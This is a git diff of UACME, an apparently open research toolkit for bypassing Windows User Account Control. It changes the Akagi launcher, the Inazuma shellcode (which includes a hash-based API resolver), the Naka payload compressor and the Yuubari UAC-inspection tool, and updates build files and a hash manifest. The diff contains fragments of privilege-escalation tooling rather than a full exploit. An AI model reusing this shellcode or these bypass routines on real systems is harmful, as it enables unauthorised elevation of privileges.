@@ -179,6 +190,7 @@ NTSTATUS NTAPI supDetectObjectCallback(
_In_ PVOID CallbackParam
)
{
+ SIZE_T BufferSize;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
@@ -189,16 +201,17 @@ NTSTATUS NTAPI supDetectObjectCallback(
return STATUS_INVALID_PARAMETER_2;
}
- if (Param->Buffer == NULL || Param->BufferSize == 0) {
- return STATUS_MEMORY_NOT_ALLOCATED;
- }
-
if (Entry->Name.Buffer) {
- _strncpy(
- Param->Buffer, Param->BufferSize / sizeof(WCHAR),
- Entry->Name.Buffer, Param->BufferSize / sizeof(WCHAR)
- );
- return STATUS_SUCCESS;
+ BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
+ Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
+ if (Param->Buffer) {
+ Param->BufferSize = BufferSize;
+ _strncpy(
+ Param->Buffer, Param->BufferSize / sizeof(WCHAR),
+ Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
+ );
+ return STATUS_SUCCESS;
+ }
}
return STATUS_UNSUCCESSFUL;
}
@@ -327,15 +340,18 @@ HRESULT WINAPI TaskDialogIndirectForward(
if (lpszDirectoryName == NULL)
break;
- sz = 0x1000 + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
+ sz = SXS_DIRECTORY_LENGTH + COMCTL32_SLASH_LENGTH + ((1 + _strlen(lpszDirectoryName)) * sizeof(WCHAR));
NtAllocateVirtualMemory(NtCurrentProcess(), &lpSxsPath, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (lpSxsPath == NULL)
break;
- _strcpy(lpSxsPath, L"\\\\?\\globalroot\\systemroot\\winsxs\\");
+ _strcpy(lpSxsPath, T_SXS_DIRECTORY);
_strcat(lpSxsPath, lpszDirectoryName);
- _strcat(lpSxsPath, L"\\comctl32.dll");
+ _strcat(lpSxsPath, T_COMCTL32_SLASH);
+ DllName.Buffer = NULL;
+ DllName.Length = 0;
+ DllName.MaximumLength = 0;
RtlInitUnicodeString(&DllName, lpSxsPath);
if (NT_SUCCESS(LdrLoadDll(NULL, NULL, &DllName, &hLib))) {
if (hLib) {
@@ -389,39 +405,34 @@ BOOL ucmQueryCustomParameter(
STARTUPINFOW startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
-
- WCHAR szBuffer[MAX_PATH * 2];
OBJSCANPARAM Param;
do {
- RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
- Param.Buffer = szBuffer;
- Param.BufferSize = sizeof(szBuffer);
+ Param.Buffer = NULL;
+ Param.BufferSize = 0;
status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
supDetectObjectCallback, &Param);
if (!NT_SUCCESS(status))
break;
- RtlSecureZeroMemory(&usKey, sizeof(usKey));
- RtlInitUnicodeString(&usKey, szBuffer);
-
- memIO = 0x1000 + (_strlen(szBuffer) * sizeof(WCHAR));
+ if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
+ break;
+ memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
lpszParamKey = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);
if (lpszParamKey == NULL)
break;
- _strcpy_w(lpszParamKey, L"\\REGISTRY\\USER\\");
- _strcat_w(lpszParamKey, usKey.Buffer);
+ _strcpy_w(lpszParamKey, T_REGISTRY_USER);
+ _strcat_w(lpszParamKey, Param.Buffer);
_strcat_w(lpszParamKey, L"\\");
_strcat_w(lpszParamKey, T_AKAGI_KEY);
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, lpszParamKey);
InitializeObjectAttributes(&obja, &usKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
-
status = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obja);
if (!NT_SUCCESS(status)) {
break;
@@ -473,6 +484,9 @@ BOOL ucmQueryCustomParameter(
NtDeleteKey(hKey);
NtClose(hKey);
}
+ if (Param.Buffer != NULL) {
+ RtlFreeHeap(ProcessHeap, 0, Param.Buffer);
+ }
if (lpszParamKey != NULL) {
RtlFreeHeap(ProcessHeap, 0, lpszParamKey);
}
diff --git a/Source/Ikazuchi/version.rc b/Source/Ikazuchi/version.rc
index ba9896d..5f89e12 100644
Binary files a/Source/Ikazuchi/version.rc and b/Source/Ikazuchi/version.rc differ
diff --git a/Source/Inazuma/Inazuma.vcxproj b/Source/Inazuma/Inazuma.vcxproj
index 7831693..de3b0c6 100644
--- a/Source/Inazuma/Inazuma.vcxproj
+++ b/Source/Inazuma/Inazuma.vcxproj
@@ -46,6 +46,7 @@
$(ProjectName)32
false
SecurityRules.ruleset
+ false
false
@@ -53,18 +54,20 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
false
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
- Level3
+ Level4
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
false
+ $(SolutionDir)
Windows
@@ -74,7 +77,7 @@
- Level3
+ Level4
MaxSpeed
@@ -85,6 +88,7 @@
false
Size
+ $(SolutionDir)
Windows
diff --git a/Source/Inazuma/main.c b/Source/Inazuma/main.c
index b4db12d..d5f7373 100644
--- a/Source/Inazuma/main.c
+++ b/Source/Inazuma/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015
+* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: MAIN.C
*
-* VERSION: 1.90
+* VERSION: 2.57
*
-* DATE: 16 Sept 2015
+* DATE: 06 Mar 2017
*
* ShellCode.
*
@@ -21,7 +21,7 @@
#pragma warning(disable: 4005) // macro redefinition
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@@ -35,6 +35,14 @@
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
+/*
+* gethash
+*
+* Purpose:
+*
+* Used in shellcode, calculates specific hash for string.
+*
+*/
DWORD gethash(char *s)
{
DWORD h = 0;
@@ -48,6 +56,14 @@ DWORD gethash(char *s)
return h;
}
+/*
+* rawGetProcAddress
+*
+* Purpose:
+*
+* GetProcAddress small implementation for shellcode.
+*
+*/
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
{
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
@@ -69,6 +85,14 @@ PVOID rawGetProcAddress(PVOID Module, DWORD hash)
return NULL;
}
+/*
+* main
+*
+* Purpose:
+*
+* Shellcode entry point.
+*
+*/
void main()
{
PTEB teb = (PTEB)__readfsdword(0x18);
diff --git a/Source/Naka/Naka.vcxproj b/Source/Naka/Naka.vcxproj
index bf8062a..48099ca 100644
--- a/Source/Naka/Naka.vcxproj
+++ b/Source/Naka/Naka.vcxproj
@@ -88,14 +88,14 @@
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
@@ -105,6 +105,7 @@
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
+ $(SolutionDir)
Windows
@@ -120,6 +121,7 @@
Disabled
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
+ $(SolutionDir)
Windows
@@ -138,6 +140,7 @@
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(SolutionDir)
Windows
@@ -147,6 +150,9 @@
true
main
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe
+
@@ -159,6 +165,7 @@
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(SolutionDir)
Windows
@@ -168,6 +175,9 @@
true
main
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe
+
diff --git a/Source/Naka/main.c b/Source/Naka/main.c
index 4d75829..097c148 100644
--- a/Source/Naka/main.c
+++ b/Source/Naka/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
-* VERSION: 2.51
+* VERSION: 2.57
*
-* DATE: 10 July 2016
+* DATE: 07 Mar 2017
*
* Naka, support payload compressor.
*
@@ -41,10 +41,10 @@
#include
#include
-#include "..\shared\ntos.h"
-#include "..\shared\minirtl.h"
-#include "..\Shared\cmdline.h"
-#include "..\Shared\_filename.h"
+#include "shared\ntos.h"
+#include "shared\minirtl.h"
+#include "shared\cmdline.h"
+#include "shared\_filename.h"
ULONG g_XorKey = 'naka';
@@ -189,6 +189,7 @@ PUCHAR CompressBufferLZNT1(
if (status != STATUS_SUCCESS) {
VirtualFree(CompBuffer, 0, MEM_RELEASE);
+ CompBuffer = NULL;
break;
}
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 401fc79..b989ec7 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.59
+* VERSION: 1.60
*
-* DATE: 28 Feb 2017
+* DATE: 02 Mar 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -5202,6 +5202,89 @@ NTSTATUS NTAPI RtlQueryElevationFlags(
** UAC Elevation END
*/
+
+/*
+* Memory parition START
+*/
+
+typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
+ SystemMemoryPartitionInformation = 0,
+ SystemMemoryPartitionMoveMemory = 1,
+ SystemMemoryPartitionAddPagefile = 2,
+ SystemMemoryPartitionCombineMemory = 3,
+ SystemMemoryPartitionInitialAddMemory = 4
+} MEMORY_PARTITION_INFORMATION_CLASS;
+
+typedef struct _MEMORY_PARTITION_PAGE_RANGE {
+ ULONG_PTR StartPage;
+ ULONG_PTR NumberOfPages;
+} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
+
+typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
+ ULONG Flags;
+ ULONG NumberOfRanges;
+ ULONG_PTR NumberOfPagesAdded;
+ MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
+} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
+ PVOID StopHandle;
+ ULONG Flags;
+ ULONG_PTR TotalNumberOfPages;
+} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
+ UNICODE_STRING PageFileName;
+ LARGE_INTEGER MinimumSize;
+ LARGE_INTEGER MaximumSize;
+ ULONG Flags;
+} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
+ ULONG_PTR NumberOfPages;
+ ULONG NumaNode;
+ ULONG Flags;
+} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
+
+typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
+ ULONG Flags;
+ ULONG NumaNode;
+ ULONG Channel;
+ ULONG NumberOfNumaNodes;
+ ULONG_PTR ResidentAvailablePages;
+ ULONG_PTR CommittedPages;
+ ULONG_PTR CommitLimit;
+ ULONG_PTR PeakCommitment;
+ ULONG_PTR TotalNumberOfPages;
+ ULONG_PTR AvailablePages;
+ ULONG_PTR ZeroPages;
+ ULONG_PTR FreePages;
+ ULONG_PTR StandbyPages;
+} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
+
+NTSTATUS NTAPI NtOpenPartition(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes
+ );
+
+NTSTATUS NTAPI NtManagePartition(
+ _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
+ _Inout_ PVOID PartitionInformation,
+ _In_ ULONG PartitionInformationLength
+ );
+
+NTSTATUS NTAPI NtCreatePartition(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG PreferredNode
+ );
+
+/*
+* Memory partition END
+*/
+
/*
** Native API START
*/
diff --git a/Source/Yuubari/Resource.rc b/Source/Yuubari/Resource.rc
index 31dba56..3e4811a 100644
Binary files a/Source/Yuubari/Resource.rc and b/Source/Yuubari/Resource.rc differ
diff --git a/Source/Yuubari/Yuubari.vcxproj b/Source/Yuubari/Yuubari.vcxproj
index 74a8bbb..8427e7c 100644
--- a/Source/Yuubari/Yuubari.vcxproj
+++ b/Source/Yuubari/Yuubari.vcxproj
@@ -64,6 +64,7 @@
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
+ $(ProjectDir)
Console
@@ -86,6 +87,7 @@
MultiThreaded
Guard
true
+ $(ProjectDir)
Console
diff --git a/Source/Yuubari/appinfo.c b/Source/Yuubari/appinfo.c
index 591c5ab..67eb936 100644
--- a/Source/Yuubari/appinfo.c
+++ b/Source/Yuubari/appinfo.c
@@ -4,9 +4,9 @@
*
* TITLE: APPINFO.C
*
-* VERSION: 1.10
+* VERSION: 1.21
*
-* DATE: 19 Feb 2017
+* DATE: 04 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -30,18 +30,14 @@ pfnSymUnloadModule64 pSymUnloadModule64 = NULL;
pfnSymFromAddrW pSymFromAddrW = NULL;
pfnSymCleanup pSymCleanup = NULL;
-//
-// Should be = supported Windows builds
-//
#define SUPPORTED_PATTERNS_COUNT 6
-
UAC_PATTERN g_MmcPatterns[SUPPORTED_PATTERNS_COUNT] = {
{ ptMmcBlock_7600, sizeof(ptMmcBlock_7600), 7600, 7600 },
{ ptMmcBlock_7601, sizeof(ptMmcBlock_7601), 7601, 7601 },
{ ptMmcBlock_9200, sizeof(ptMmcBlock_9200), 9200, 9200 },
{ ptMmcBlock_9600, sizeof(ptMmcBlock_9600), 9600, 9600 },
{ ptMmcBlock_10240, sizeof(ptMmcBlock_10240), 10240, 10240 },
- { ptMmcBlock_10586_15046, sizeof(ptMmcBlock_10586_15046), 10586, 15046 }
+ { ptMmcBlock_10586_15048, sizeof(ptMmcBlock_10586_15048), 10586, 15048 }
};
#define TestChar(x) ((x >= L'A') && (x <= L'z'))
diff --git a/Source/Yuubari/consts.h b/Source/Yuubari/consts.h
index 46c0321..eefdc70 100644
--- a/Source/Yuubari/consts.h
+++ b/Source/Yuubari/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 02 Mar 2017
*
* Global consts definition file.
*
@@ -33,7 +33,7 @@
#define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled")
#define T_PROGRAM_NAME TEXT("Yuubari")
-#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.0 (01/03/2017)\n")
+#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.1 (02/03/2017)\n")
#define T_HELP TEXT("Optional parameters to execute: \n\n\r\
YUUBARI [/v] \n\n\r\
diff --git a/Source/Yuubari/main.c b/Source/Yuubari/main.c
index a65e2c9..246eb3b 100644
--- a/Source/Yuubari/main.c
+++ b/Source/Yuubari/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 07 Mar 2017
*
* Program entry point.
*
diff --git a/Source/Yuubari/patterns.h b/Source/Yuubari/patterns.h
index 0b4d273..a72b370 100644
--- a/Source/Yuubari/patterns.h
+++ b/Source/Yuubari/patterns.h
@@ -4,15 +4,15 @@
*
* TITLE: PATTERNS.H
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 01 Mar 2017
+* DATE: 04 Mar 2017
*
* Patterns for supported AppInfo versions.
*
* Minimum client: 7600
*
-* Maximum client: 15046
+* Maximum client: 15048
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -41,7 +41,7 @@ unsigned char ptMmcBlock_9600[] = {
unsigned char ptMmcBlock_10240[] = {
0x49, 0x8B, 0x14, 0x24, 0x49, 0x8B, 0xCE, 0xFF, 0x15
};
-unsigned char ptMmcBlock_10586_15046[] = {
+unsigned char ptMmcBlock_10586_15048[] = {
0x49, 0x8B, 0x16, 0x49, 0x8B, 0xCD, 0xFF, 0x15
};
diff --git a/Source/Yuubari/tests/test_fusion.c b/Source/Yuubari/tests/test_fusion.c
index 8022839..7f02aac 100644
--- a/Source/Yuubari/tests/test_fusion.c
+++ b/Source/Yuubari/tests/test_fusion.c
@@ -4,9 +4,9 @@
*
* TITLE: TEST_FUSION.C
*
-* VERSION: 1.10
+* VERSION: 1.21
*
-* DATE: 20 Feb 2017
+* DATE: 03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -14,8 +14,8 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
-#include "..\global.h"
-#include "..\fusion.h"
+#include "global.h"
+#include "fusion.h"
BYTE TestArray[1024 * 32] = { 0 };
diff --git a/Source/uacme.sln b/Source/uacme.sln
index fc6d2c8..05a2ebd 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -22,6 +22,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A
Shared\cmdline.c = Shared\cmdline.c
shared\minirtl.h = shared\minirtl.h
shared\ntos.h = shared\ntos.h
+ Shared\ntsxs.h = Shared\ntsxs.h
shared\rtltypes.h = shared\rtltypes.h
Shared\strtoul.c = Shared\strtoul.c
EndProjectSection
diff --git a/UACME.sha256 b/UACME.sha256
index f1b668c..7c58e16 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-2b2fcde2f1ae5876945bd2ec066016d18d9461a99eca70b5a1c597a95575ccd7 *Compiled\Akagi32.exe
-8e9687f9d47757e9c97f17d2e4f05cdd5810ff696290261da8ce9dd1ae505e4f *Compiled\Akagi64.exe
-bc7b0c12581633eae06b6f5c4ac6d97a8ad061383e6909f43037856a497b3138 *Compiled\UacInfo64.exe
+c3aadb6fb35a7bcf5855706b10e993f068828417ab7d3e12da90f0ad7b70f1f2 *Compiled\Akagi32.exe
+38149f3b29758b855354bab50beb4e910cce9f2b5cfa393e940e4618eaf1cb76 *Compiled\Akagi64.exe
+b6566783e023d055c31830ce754ea806cc3e4da856dc016264db16013cd8929d *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-9a7fcbc8cbd7b8a875f828e45f1813847c9daa52bbe63864154f71ed53a056fb *Source\uacme.sln
+39cd224f1349523f193b0bd95ccae5d6ee31dbd625aae5b4ab91cca2bdeb69c7 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
@@ -13,78 +13,81 @@ b5158a54a382d5d219af835d6664525b54bc30bbb4999ed73741a4731e8db040 *Source\Akagi\b
65ca05df060b36704e38db08c0c56a358c4c73145a690f0713bb1c5560fc0a98 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
3163a5938ab4f15082f0960e30f39d29bd5a120e692134db8a7da2ea6c6b1978 *Source\Akagi\comet.c
-ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
-f08a3e73e61836aa5a77441f75f6c0798512b5e949f84aa2caef0646c70005b4 *Source\Akagi\compress.c
+888f884ca226ac9c1f615496f70fd4e9e03976f40de3a4026b4f9cdbc92347d9 *Source\Akagi\comet.h
+b8e8bcfcec9529c1aa34bb1d1b19e66f7ef157962e65eb390c54705accc78126 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
27c861254f565093f5b30d03640121bb3bd4a8d0e7b4b627dc33eee0e8dc8f2e *Source\Akagi\consts.h
-b91747dbb9928504618194423d1d2d0a32f7fd2c4d0233778bc48c121ba98ba2 *Source\Akagi\enigma0x3.c
+6081ff03b89f37e46e378ce0258336ad5451fc821c4fc7da5ddfa5c92b5db0cd *Source\Akagi\enigma0x3.c
362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
-682b685196d19eaaecdd73f371515cea13ef67ae34dd1f6ecb3d711e29e0e42f *Source\Akagi\explife.c
+425bd2ffc4dcd71ed5dac01f31236cdc80ab5ca5c77e211b3c58c48adead3da6 *Source\Akagi\explife.c
f4315ba7926b6a73a497b1dad53bb47509f43fb20009cee051ca065f41cb3417 *Source\Akagi\explife.h
-a06795ff3509f2d02a6e3ca3e675d306e7c9669e6b87e6e1d2f14d6f149245e3 *Source\Akagi\global.h
+ed2d2dd8f192251a608bb98d51f09bc2f792494c79330d6d9184e1806e3513bc *Source\Akagi\global.h
5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
-f166daea90a02bd9ba0fbbfae26c668a470f680a5ed752bdd4052fb82ef78b7c *Source\Akagi\hybrids.c
+49458af00933874313d878e3c223473c10eff60a3e79d209967eee8a78d9a344 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
-220dd784ef9475bbeb21f7ecb9c54acfd571f8c420dc7e0c6dd632694261ab3b *Source\Akagi\main.c
+78598dd659978dd673739cefac448aeb5bb6799692c5f23ba36300115f9d43ae *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
795a325be6a31be7d91d09c230a00b2503ad061080fb494ae49c532a283d7bb8 *Source\Akagi\pitou.c
1f4be768fd390a3c8f80a326f10bf626c01da4e70cf89c46139dc64c8425647f *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-e81122b88e1574515722554f2edddde13db239fc21617fe7a78a8827d6ea07fb *Source\Akagi\Resource.rc
+4da1fb2643bae679d681ef3ea94539a58177098ea36ba7cf7227ff48cff5ad2f *Source\Akagi\Resource.rc
d76f935faa2318354b976f83a30223e4fadcf8ae3df720577aafa5b2d5a7deaa *Source\Akagi\simda.c
450593a7d138e57b10200ecaeb1ac75ef0c8dd348f64b3a2e9e960740ca4a0fd *Source\Akagi\simda.h
-41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
+8ba2fdaba2d39c321b8d17974bafbb56554d7e049e4494c5a9bcd59765916d17 *Source\Akagi\sirefef.h
084bbb45cfae0af57bbef71b351a28c03e20ce7666c3e3e38d3ed3597bdccb1a *Source\Akagi\sup.c
b190b33893283d13de945bd0c63fd1f3e0f5df3c8f74e50daa29c3bbf57cac9b *Source\Akagi\sup.h
-ed49c508485eb1a372ddcd131aa688c969fa536f3845055e51b5611c2a792d49 *Source\Akagi\uacme.vcxproj
-fdb9f869c33fd8208c837548d3a827e20312249455c19f8cd34a01fd20e2cccd *Source\Akagi\uacme.vcxproj.filters
-eb362511262bd72ee14392aac1fd7c64f4be77d96b47797ac69dbadc873acc50 *Source\Akagi\uacme.vcxproj.user
-087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
-dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
-0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
-65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd
-b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd
-c650a5448056d708d21799617246ee47f9569afa5415e78f9be07d85055ead46 *Source\Akagi\bin\Ikazuchi64.cd
+8b47a94d19a8c883e95174faa880839c814501326db310c6c166697b0124314c *Source\Akagi\uacme.vcxproj
+05f28a23f92ed4dee4490ed547d06d49e90d521037711ec4d63382d83d868b4c *Source\Akagi\uacme.vcxproj.filters
+3b33eaab5cf41c023af5b51bf6348ecb6b6181b81b82d1ae4a577f84c7cc2069 *Source\Akagi\uacme.vcxproj.user
+d47ce8e2e94e6837f60ffe384e50d72c896e3325a49d45021787b3754f9eb6c7 *Source\Akagi\bin\Fubuki32.cd
+cf617d6472d2f81d11cfdf654c8ccccc3ef2d14bc5854e0deefdb53f72cefb47 *Source\Akagi\bin\Fubuki64.cd
+94ebfac14f977d4bd8a0e655eac290c49b20285d8fff32e33d668cce51580a1f *Source\Akagi\bin\Hibiki32.cd
+ec5e1b33a24f3278b1bc070333ed495909d7ded3d49156c97dda72131c01cbe0 *Source\Akagi\bin\Hibiki64.cd
+c61f3a9a959eb6bd2eaec276eff854d07f6f183d46588da5e68c0e8a009f5d1d *Source\Akagi\bin\Ikazuchi32.cd
+37cee2abfa1f8e3713e4b7282d8888c1d91fcbf517edd4c5d452942ab2c7057e *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
-28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj
+f49b43684d8b4bb77cbfc3a304951241d868259ece59af019fc375748dab72dd *Source\Akagi\tests\test.c
+dab6e990a8872a3c25f95e7ce2a8ad2da1f99167b563662bdad44e4e20b7c769 *Source\Akagi\tests\test.h
+e1a1592759e7f8f1f50e3f5b1ad55067ec30bcd44072f84a163f91956b72710d *Source\Fubuki\dll.vcxproj
d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
-57aa4133d0328d2a44825ff4d8804f52518fdea6e83d9cca7b60c3777324be85 *Source\Fubuki\dllmain.c
+a4cf42b8c2ea71d8efa61e55b54a736c256d1cdd99f5774a15beec8b85327d68 *Source\Fubuki\dllmain.c
c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
-b356eba53196c805864e2ac2fd5a4b38984a377698320c34dc70484de61f2adb *Source\Fubuki\version.rc
+0109acffa378156d44353a55d398f4f48bb51e4c59e268c8f3ffba6553f307ef *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
-7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c
-769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj
+47aed58ea27d928443197579dfa0c52718a3f6784464c9b1e7cd965d790e112b *Source\Hibiki\dllmain.c
